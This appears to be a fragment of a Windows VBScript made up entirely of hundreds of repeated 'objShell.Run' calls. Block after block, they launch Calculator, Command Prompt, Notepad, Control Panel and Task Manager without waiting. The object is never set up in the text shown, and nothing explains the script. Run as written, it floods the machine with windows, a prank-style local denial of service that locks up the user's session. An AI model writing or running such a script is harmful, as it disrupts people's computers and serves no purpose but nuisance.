objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
